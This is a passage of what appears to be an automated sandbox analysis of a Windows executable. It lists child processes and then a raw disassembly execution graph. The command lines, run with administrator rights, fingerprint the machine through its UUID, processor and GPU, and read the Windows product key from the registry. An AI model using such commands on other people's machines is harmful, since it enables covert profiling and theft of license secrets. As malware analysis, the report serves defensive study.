                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:106
                                                                                                                                                                                                                                                                  Start time:02:36:19
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:107
                                                                                                                                                                                                                                                                  Start time:02:36:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:108
                                                                                                                                                                                                                                                                  Start time:02:36:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:109
                                                                                                                                                                                                                                                                  Start time:02:36:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:110
                                                                                                                                                                                                                                                                  Start time:02:36:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:111
                                                                                                                                                                                                                                                                  Start time:02:36:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:112
                                                                                                                                                                                                                                                                  Start time:02:36:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:113
                                                                                                                                                                                                                                                                  Start time:02:36:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:114
                                                                                                                                                                                                                                                                  Start time:02:36:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:115
                                                                                                                                                                                                                                                                  Start time:02:36:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:9.6%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:20.1%
                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                    execution_graph 19533 7ff7c267c590 19544 7ff7c2680348 EnterCriticalSection 19533->19544 19713 7ff7c267f9fc 19714 7ff7c267fbee 19713->19714 19716 7ff7c267fa3e _isindst 19713->19716 19715 7ff7c2674f78 memcpy_s 11 API calls 19714->19715 19733 7ff7c267fbde 19715->19733 19716->19714 19719 7ff7c267fabe _isindst 19716->19719 19717 7ff7c266c5c0 _log10_special 8 API calls 19718 7ff7c267fc09 19717->19718 19734 7ff7c2686204 19719->19734 19724 7ff7c267fc1a 19725 7ff7c267a970 _isindst 17 API calls 19724->19725 19727 7ff7c267fc2e 19725->19727 19731 7ff7c267fb1b 19731->19733 19759 7ff7c2686248 19731->19759 19733->19717 19735 7ff7c2686213 19734->19735 19736 7ff7c267fadc 19734->19736 19766 7ff7c2680348 EnterCriticalSection 19735->19766 19741 7ff7c2685608 19736->19741 19742 7ff7c267faf1 19741->19742 19743 7ff7c2685611 19741->19743 19742->19724 19747 7ff7c2685638 19742->19747 19744 7ff7c2674f78 memcpy_s 11 API calls 19743->19744 19745 7ff7c2685616 19744->19745 19746 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19745->19746 19746->19742 19748 7ff7c267fb02 19747->19748 19749 7ff7c2685641 19747->19749 19748->19724 19753 7ff7c2685668 19748->19753 19750 7ff7c2674f78 memcpy_s 11 API calls 19749->19750 19751 7ff7c2685646 19750->19751 19752 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19751->19752 19752->19748 19754 7ff7c267fb13 19753->19754 19755 7ff7c2685671 19753->19755 19754->19724 19754->19731 19756 7ff7c2674f78 memcpy_s 11 API calls 19755->19756 19757 7ff7c2685676 19756->19757 19758 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 19757->19758 19758->19754 19767 7ff7c2680348 EnterCriticalSection 19759->19767 20035 7ff7c2675480 20036 7ff7c267548b 20035->20036 20044 7ff7c267f314 20036->20044 20057 7ff7c2680348 EnterCriticalSection 20044->20057 20062 7ff7c268ae6e 20063 7ff7c268ae87 20062->20063 20064 7ff7c268ae7d 20062->20064 20066 7ff7c26803a8 LeaveCriticalSection 20064->20066 19787 7ff7c268add9 19790 7ff7c26754e8 LeaveCriticalSection 19787->19790 20068 7ff7c268ac53 20069 7ff7c268ac63 20068->20069 20072 7ff7c26754e8 LeaveCriticalSection 20069->20072 19472 7ff7c26799d1 19473 7ff7c267a448 45 API calls 19472->19473 19474 7ff7c26799d6 19473->19474 19475 7ff7c26799fd GetModuleHandleW 19474->19475 19476 7ff7c2679a47 19474->19476 19475->19476 19480 7ff7c2679a0a 19475->19480 19484 7ff7c26798d4 19476->19484 19480->19476 19498 7ff7c2679af8 GetModuleHandleExW 19480->19498 19504 7ff7c2680348 EnterCriticalSection 19484->19504 19499 7ff7c2679b2c GetProcAddress 19498->19499 19500 7ff7c2679b55 19498->19500 19501 7ff7c2679b3e 19499->19501 19502 7ff7c2679b5a FreeLibrary 19500->19502 19503 7ff7c2679b61 19500->19503 19501->19500 19502->19503 19503->19476 19515 7ff7c266bb50 19516 7ff7c266bb7e 19515->19516 19517 7ff7c266bb65 19515->19517 19517->19516 19519 7ff7c267d66c 12 API calls 19517->19519 19518 7ff7c266bbde 19519->19518 18721 7ff7c2680938 18722 7ff7c268095c 18721->18722 18726 7ff7c268096c 18721->18726 18723 7ff7c2674f78 memcpy_s 11 API calls 18722->18723 18724 7ff7c2680961 18723->18724 18725 7ff7c2680c4c 18728 7ff7c2674f78 memcpy_s 11 API calls 18725->18728 18726->18725 18727 7ff7c268098e 18726->18727 18729 7ff7c26809af 18727->18729 18852 7ff7c2680ff4 18727->18852 18730 7ff7c2680c51 18728->18730 18733 7ff7c2680a21 18729->18733 18735 7ff7c26809d5 18729->18735 18740 7ff7c2680a15 18729->18740 18732 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18730->18732 18732->18724 18737 7ff7c267ec08 memcpy_s 11 API calls 18733->18737 18753 7ff7c26809e4 18733->18753 18734 7ff7c2680ace 18743 7ff7c2680aeb 18734->18743 18750 7ff7c2680b3d 18734->18750 18867 7ff7c2679730 18735->18867 18741 7ff7c2680a37 18737->18741 18739 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18739->18724 18740->18734 18740->18753 18873 7ff7c268719c 18740->18873 18744 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18741->18744 18747 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18743->18747 18748 7ff7c2680a45 18744->18748 18745 7ff7c26809fd 18745->18740 18752 7ff7c2680ff4 45 API calls 18745->18752 18746 7ff7c26809df 18749 7ff7c2674f78 memcpy_s 11 API calls 18746->18749 18751 7ff7c2680af4 18747->18751 18748->18740 18748->18753 18756 7ff7c267ec08 memcpy_s 11 API calls 18748->18756 18749->18753 18750->18753 18754 7ff7c268344c 40 API calls 18750->18754 18762 7ff7c2680af9 18751->18762 18909 7ff7c268344c 18751->18909 18752->18740 18753->18739 18755 7ff7c2680b7a 18754->18755 18758 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18755->18758 18757 7ff7c2680a67 18756->18757 18760 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18757->18760 18761 7ff7c2680b84 18758->18761 18760->18740 18761->18753 18761->18762 18763 7ff7c2680c40 18762->18763 18767 7ff7c267ec08 memcpy_s 11 API calls 18762->18767 18765 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18763->18765 18764 7ff7c2680b25 18766 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18764->18766 18765->18724 18766->18762 18768 7ff7c2680bc8 18767->18768 18769 7ff7c2680bd9 18768->18769 18770 7ff7c2680bd0 18768->18770 18771 7ff7c267a514 __std_exception_copy 37 API calls 18769->18771 18772 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18770->18772 18774 7ff7c2680be8 18771->18774 18773 7ff7c2680bd7 18772->18773 18779 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18773->18779 18775 7ff7c2680c7b 18774->18775 18776 7ff7c2680bf0 18774->18776 18778 7ff7c267a970 _isindst 17 API calls 18775->18778 18918 7ff7c26872b4 18776->18918 18781 7ff7c2680c8f 18778->18781 18779->18724 18784 7ff7c2680cb8 18781->18784 18790 7ff7c2680cc8 18781->18790 18782 7ff7c2680c38 18785 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18782->18785 18783 7ff7c2680c17 18786 7ff7c2674f78 memcpy_s 11 API calls 18783->18786 18787 7ff7c2674f78 memcpy_s 11 API calls 18784->18787 18785->18763 18788 7ff7c2680c1c 18786->18788 18811 7ff7c2680cbd 18787->18811 18791 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18788->18791 18789 7ff7c2680fab 18793 7ff7c2674f78 memcpy_s 11 API calls 18789->18793 18790->18789 18792 7ff7c2680cea 18790->18792 18791->18773 18794 7ff7c2680d07 18792->18794 18937 7ff7c26810dc 18792->18937 18795 7ff7c2680fb0 18793->18795 18798 7ff7c2680d7b 18794->18798 18800 7ff7c2680d2f 18794->18800 18806 7ff7c2680d6f 18794->18806 18797 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18795->18797 18797->18811 18802 7ff7c2680da3 18798->18802 18807 7ff7c267ec08 memcpy_s 11 API calls 18798->18807 18819 7ff7c2680d3e 18798->18819 18799 7ff7c2680e2e 18809 7ff7c2680e4b 18799->18809 18820 7ff7c2680e9e 18799->18820 18952 7ff7c267976c 18800->18952 18804 7ff7c267ec08 memcpy_s 11 API calls 18802->18804 18802->18806 18802->18819 18810 7ff7c2680dc5 18804->18810 18805 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18805->18811 18806->18799 18806->18819 18958 7ff7c268705c 18806->18958 18812 7ff7c2680d95 18807->18812 18815 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18809->18815 18816 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18810->18816 18817 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18812->18817 18813 7ff7c2680d39 18818 7ff7c2674f78 memcpy_s 11 API calls 18813->18818 18814 7ff7c2680d57 18814->18806 18822 7ff7c26810dc 45 API calls 18814->18822 18821 7ff7c2680e54 18815->18821 18816->18806 18817->18802 18818->18819 18819->18805 18820->18819 18823 7ff7c268344c 40 API calls 18820->18823 18826 7ff7c268344c 40 API calls 18821->18826 18828 7ff7c2680e5a 18821->18828 18822->18806 18824 7ff7c2680edc 18823->18824 18825 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18824->18825 18827 7ff7c2680ee6 18825->18827 18830 7ff7c2680e86 18826->18830 18827->18819 18827->18828 18829 7ff7c2680f9f 18828->18829 18833 7ff7c267ec08 memcpy_s 11 API calls 18828->18833 18831 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18829->18831 18832 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18830->18832 18831->18811 18832->18828 18834 7ff7c2680f2b 18833->18834 18835 7ff7c2680f3c 18834->18835 18836 7ff7c2680f33 18834->18836 18838 7ff7c26804e4 37 API calls 18835->18838 18837 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18836->18837 18839 7ff7c2680f3a 18837->18839 18840 7ff7c2680f4a 18838->18840 18846 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18839->18846 18841 7ff7c2680f52 SetEnvironmentVariableW 18840->18841 18842 7ff7c2680fdf 18840->18842 18843 7ff7c2680f97 18841->18843 18844 7ff7c2680f76 18841->18844 18845 7ff7c267a970 _isindst 17 API calls 18842->18845 18847 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18843->18847 18848 7ff7c2674f78 memcpy_s 11 API calls 18844->18848 18849 7ff7c2680ff3 18845->18849 18846->18811 18847->18829 18850 7ff7c2680f7b 18848->18850 18851 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18850->18851 18851->18839 18853 7ff7c2681029 18852->18853 18854 7ff7c2681011 18852->18854 18855 7ff7c267ec08 memcpy_s 11 API calls 18853->18855 18854->18729 18862 7ff7c268104d 18855->18862 18856 7ff7c26810d2 18858 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18856->18858 18857 7ff7c26810ae 18859 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18857->18859 18860 7ff7c26810d8 18858->18860 18859->18854 18861 7ff7c267ec08 memcpy_s 11 API calls 18861->18862 18862->18856 18862->18857 18862->18861 18863 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18862->18863 18864 7ff7c267a514 __std_exception_copy 37 API calls 18862->18864 18865 7ff7c26810bd 18862->18865 18863->18862 18864->18862 18866 7ff7c267a970 _isindst 17 API calls 18865->18866 18866->18856 18868 7ff7c2679740 18867->18868 18871 7ff7c2679749 18867->18871 18868->18871 18982 7ff7c2679208 18868->18982 18871->18745 18871->18746 18874 7ff7c26871a9 18873->18874 18875 7ff7c26862c4 18873->18875 18877 7ff7c2674fbc 45 API calls 18874->18877 18876 7ff7c26862d1 18875->18876 18883 7ff7c2686307 18875->18883 18880 7ff7c2674f78 memcpy_s 11 API calls 18876->18880 18896 7ff7c2686278 18876->18896 18879 7ff7c26871dd 18877->18879 18878 7ff7c2686331 18881 7ff7c2674f78 memcpy_s 11 API calls 18878->18881 18882 7ff7c26871e2 18879->18882 18886 7ff7c26871f3 18879->18886 18891 7ff7c268720a 18879->18891 18884 7ff7c26862db 18880->18884 18885 7ff7c2686336 18881->18885 18882->18740 18883->18878 18887 7ff7c2686356 18883->18887 18888 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18884->18888 18890 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18885->18890 18892 7ff7c2674f78 memcpy_s 11 API calls 18886->18892 18893 7ff7c2674fbc 45 API calls 18887->18893 18899 7ff7c2686341 18887->18899 18889 7ff7c26862e6 18888->18889 18889->18740 18890->18899 18894 7ff7c2687226 18891->18894 18895 7ff7c2687214 18891->18895 18897 7ff7c26871f8 18892->18897 18893->18899 18901 7ff7c268724e 18894->18901 18902 7ff7c2687237 18894->18902 18900 7ff7c2674f78 memcpy_s 11 API calls 18895->18900 18896->18740 18898 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18897->18898 18898->18882 18899->18740 18903 7ff7c2687219 18900->18903 19224 7ff7c2688fbc 18901->19224 19215 7ff7c2686314 18902->19215 18906 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18903->18906 18906->18882 18908 7ff7c2674f78 memcpy_s 11 API calls 18908->18882 18910 7ff7c268346e 18909->18910 18911 7ff7c268348b 18909->18911 18910->18911 18912 7ff7c268347c 18910->18912 18913 7ff7c2683495 18911->18913 19264 7ff7c2687ca8 18911->19264 18914 7ff7c2674f78 memcpy_s 11 API calls 18912->18914 19271 7ff7c2687ce4 18913->19271 18917 7ff7c2683481 memcpy_s 18914->18917 18917->18764 18919 7ff7c2674fbc 45 API calls 18918->18919 18920 7ff7c268731a 18919->18920 18921 7ff7c2687328 18920->18921 19283 7ff7c267ef94 18920->19283 19286 7ff7c267551c 18921->19286 18925 7ff7c2687414 18928 7ff7c2687425 18925->18928 18929 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18925->18929 18926 7ff7c2674fbc 45 API calls 18927 7ff7c2687397 18926->18927 18931 7ff7c267ef94 5 API calls 18927->18931 18933 7ff7c26873a0 18927->18933 18930 7ff7c2680c13 18928->18930 18932 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18928->18932 18929->18928 18930->18782 18930->18783 18931->18933 18932->18930 18934 7ff7c267551c 14 API calls 18933->18934 18935 7ff7c26873fb 18934->18935 18935->18925 18936 7ff7c2687403 SetEnvironmentVariableW 18935->18936 18936->18925 18938 7ff7c268111c 18937->18938 18939 7ff7c26810ff 18937->18939 18940 7ff7c267ec08 memcpy_s 11 API calls 18938->18940 18939->18794 18945 7ff7c2681140 18940->18945 18941 7ff7c267a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18943 7ff7c26811ca 18941->18943 18942 7ff7c26811a1 18944 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18942->18944 18944->18939 18945->18942 18946 7ff7c267ec08 memcpy_s 11 API calls 18945->18946 18947 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18945->18947 18948 7ff7c26804e4 37 API calls 18945->18948 18949 7ff7c26811b0 18945->18949 18951 7ff7c26811c4 18945->18951 18946->18945 18947->18945 18948->18945 18950 7ff7c267a970 _isindst 17 API calls 18949->18950 18950->18951 18951->18941 18953 7ff7c267977c 18952->18953 18955 7ff7c2679785 18952->18955 18953->18955 19308 7ff7c267927c 18953->19308 18955->18813 18955->18814 18959 7ff7c2687069 18958->18959 18964 7ff7c2687096 18958->18964 18960 7ff7c268706e 18959->18960 18959->18964 18961 7ff7c2674f78 memcpy_s 11 API calls 18960->18961 18962 7ff7c2687073 18961->18962 18966 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18962->18966 18963 7ff7c26870da 18965 7ff7c2674f78 memcpy_s 11 API calls 18963->18965 18964->18963 18967 7ff7c26870f9 18964->18967 18980 7ff7c26870ce __crtLCMapStringW 18964->18980 18968 7ff7c26870df 18965->18968 18969 7ff7c268707e 18966->18969 18970 7ff7c2687115 18967->18970 18971 7ff7c2687103 18967->18971 18972 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18968->18972 18969->18806 18974 7ff7c2674fbc 45 API calls 18970->18974 18973 7ff7c2674f78 memcpy_s 11 API calls 18971->18973 18972->18980 18975 7ff7c2687108 18973->18975 18976 7ff7c2687122 18974->18976 18977 7ff7c267a950 _invalid_parameter_noinfo 37 API calls 18975->18977 18976->18980 19355 7ff7c2688b78 18976->19355 18977->18980 18980->18806 18981 7ff7c2674f78 memcpy_s 11 API calls 18981->18980 18983 7ff7c2679221 18982->18983 18996 7ff7c267921d 18982->18996 19005 7ff7c2682660 18983->19005 18988 7ff7c2679233 18990 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18988->18990 18989 7ff7c267923f 19031 7ff7c26792ec 18989->19031 18990->18996 18993 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18994 7ff7c2679266 18993->18994 18995 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18994->18995 18995->18996 18996->18871 18997 7ff7c267955c 18996->18997 18998 7ff7c2679585 18997->18998 19003 7ff7c267959e 18997->19003 18998->18871 18999 7ff7c267ec08 memcpy_s 11 API calls 18999->19003 19000 7ff7c267962e 19002 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19000->19002 19001 7ff7c2680858 WideCharToMultiByte 19001->19003 19002->18998 19003->18998 19003->18999 19003->19000 19003->19001 19004 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19003->19004 19004->19003 19006 7ff7c268266d 19005->19006 19007 7ff7c2679226 19005->19007 19050 7ff7c267b294 19006->19050 19011 7ff7c268299c GetEnvironmentStringsW 19007->19011 19012 7ff7c26829cc 19011->19012 19013 7ff7c267922b 19011->19013 19014 7ff7c2680858 WideCharToMultiByte 19012->19014 19013->18988 19013->18989 19015 7ff7c2682a1d 19014->19015 19016 7ff7c2682a24 FreeEnvironmentStringsW 19015->19016 19017 7ff7c267d66c _fread_nolock 12 API calls 19015->19017 19016->19013 19018 7ff7c2682a37 19017->19018 19019 7ff7c2682a48 19018->19019 19020 7ff7c2682a3f 19018->19020 19022 7ff7c2680858 WideCharToMultiByte 19019->19022 19021 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19020->19021 19023 7ff7c2682a46 19021->19023 19024 7ff7c2682a6b 19022->19024 19023->19016 19025 7ff7c2682a79 19024->19025 19026 7ff7c2682a6f 19024->19026 19028 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19025->19028 19027 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19026->19027 19029 7ff7c2682a77 FreeEnvironmentStringsW 19027->19029 19028->19029 19029->19013 19032 7ff7c2679311 19031->19032 19033 7ff7c267ec08 memcpy_s 11 API calls 19032->19033 19045 7ff7c2679347 19033->19045 19034 7ff7c267934f 19035 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19034->19035 19036 7ff7c2679247 19035->19036 19036->18993 19037 7ff7c26793c2 19038 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19037->19038 19038->19036 19039 7ff7c267ec08 memcpy_s 11 API calls 19039->19045 19040 7ff7c26793b1 19209 7ff7c2679518 19040->19209 19041 7ff7c267a514 __std_exception_copy 37 API calls 19041->19045 19044 7ff7c26793e7 19047 7ff7c267a970 _isindst 17 API calls 19044->19047 19045->19034 19045->19037 19045->19039 19045->19040 19045->19041 19045->19044 19048 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19045->19048 19046 7ff7c267a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19046->19034 19049 7ff7c26793fa 19047->19049 